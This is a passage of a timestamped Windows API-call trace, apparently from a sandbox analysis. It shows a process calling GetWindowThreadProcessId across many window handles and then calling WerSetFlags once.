	[0631.446] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xdc8
	[0631.446] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xc18
	[0631.446] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xc2c
	[0631.446] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xa1c
	[0631.446] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1244
	[0631.447] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xdb0
	[0631.447] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1398
	[0631.447] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1358
	[0631.447] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1370
	[0631.447] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1340
	[0631.447] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x130c
	[0631.447] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x12c0
	[0631.447] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x12e4
	[0631.447] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1270
	[0631.447] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1298
	[0631.448] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x120c
	[0631.448] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x122c
	[0631.448] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x11c4
	[0631.448] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x11b0
	[0631.448] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1188
	[0631.448] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1148
	[0631.448] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1160
	[0631.448] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x10fc
	[0631.448] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xe34
	[0631.448] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xea4
	[0631.449] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x514
	[0631.449] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xe48
	[0631.449] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xbc8
	[0631.449] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xdf8
	[0631.449] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x318
	[0631.449] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xcac
	[0631.449] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x8bc
	[0631.449] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xf9c
	[0631.449] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xf48
	[0631.449] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xe40
	[0631.449] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xecc
	[0631.450] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xeb8
	[0631.450] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xe80
	[0631.450] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xe98
	[0631.450] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xe60
	[0631.450] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xee4
	[0631.450] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xf00
	[0631.450] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xdf0
	[0631.450] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xe1c
	[0631.450] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xdd0
	[0631.450] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xd94
	[0631.450] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xd74
	[0631.451] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xd00
	[0631.451] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xcd8
	[0631.451] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xc84
	[0631.451] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xca4
	[0631.451] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xc64
	[0631.451] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xc24
	[0631.451] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xb84
	[0631.451] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xbac
	[0631.451] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x384
	[0631.451] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xab8
	[0631.452] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x33c
	[0631.452] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xa44
	[0631.452] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xa64
	[0631.452] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x8a8
	[0631.452] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xaf0
	[0631.452] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x88c
	[0631.452] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xb04
	[0631.452] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x910
	[0631.452] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x230
	[0631.452] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xac0
	[0631.453] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xab4
	[0631.453] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xaac
	[0631.453] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x3d0
	[0631.453] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x978
	[0631.453] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xa7c
	[0631.453] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x59c
	[0631.453] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xa88
	[0631.453] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xa6c
	[0631.453] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xa68
	[0631.453] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x9f8
	[0631.454] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xa04
	[0631.454] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x924
	[0631.454] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x8dc
	[0631.454] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x7dc
	[0631.454] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x768
	[0631.454] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x764
	[0631.454] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x820
	[0631.454] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x810
	[0631.454] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x794
	[0631.455] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x83c
	[0631.455] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x7ac
	[0631.455] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xb44
	[0631.455] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xb5c
	[0631.455] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x838
	[0631.455] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0631.455] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0631.455] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0631.455] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0631.455] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0631.456] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0631.456] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0631.456] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0631.456] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x818
	[0631.456] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x5b8
	[0631.456] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x494
	[0631.456] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1ec
	[0631.456] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x440
	[0631.456] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x7e8
	[0631.456] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x730
	[0631.456] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x2c8
	[0631.457] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x31c
	[0631.457] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x330
	[0631.457] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x128
	[0631.457] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x5c8
	[0631.457] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x6f8
	[0631.457] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x358
	[0631.457] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x73c
	[0631.457] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xb0
	[0631.457] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x250
	[0631.457] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x240
	[0631.458] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x790
	[0631.458] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x61c
	[0631.458] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x540
	[0631.458] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x538
	[0631.458] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x568
	[0631.458] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x538
	[0631.458] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x568
	[0631.458] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x538
	[0631.458] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x540
	[0631.458] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x540
	[0631.459] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x57c
	[0631.459] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x460
	[0631.459] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x554
	[0631.459] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0631.459] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x528
	[0631.459] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0631.459] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0631.459] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0631.459] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x79c
	[0631.459] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0631.460] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4e0
	[0631.460] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0631.460] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x460
	[0631.460] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x460
	[0631.460] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x44c
	[0631.460] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x778
	[0631.460] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x460
	[0631.460] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x558
	[0631.460] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0631.460] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0631.460] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1bb4
	[0631.461] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x10bc
	[0631.461] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1b50
	[0631.461] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x14b4
	[0631.461] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x149c
	[0631.461] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x14a8
	[0631.461] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1490
	[0631.461] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x14a4
	[0631.461] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x148c
	[0631.461] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1458
	[0631.461] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1b4c
	[0631.461] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1b3c
	[0631.462] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x19bc
	[0631.462] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x199c
	[0631.462] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1998
	[0631.462] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1994
	[0631.462] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1990
	[0631.462] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1984
	[0631.462] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x197c
	[0631.462] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1978
	[0631.462] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1824
	[0631.462] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1088
	[0631.463] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1908
	[0631.463] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x18cc
	[0631.463] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x18d0
	[0631.463] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1840
	[0631.463] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x10c4
	[0631.463] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x128c
	[0631.463] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x16e8
	[0631.463] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x16cc
	[0631.463] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x274
	[0631.463] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x10e0
	[0631.464] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x10cc
	[0631.464] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x10c0
	[0631.464] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x10d0
	[0631.464] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1198
	[0631.464] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1080
	[0631.464] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1074
	[0631.464] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x106c
	[0631.464] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1474
	[0631.464] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1414
	[0631.464] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xbd0
	[0631.465] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x550
	[0631.465] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xa38
	[0631.465] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x16d0
	[0631.469] WerSetFlags () returned 0x0
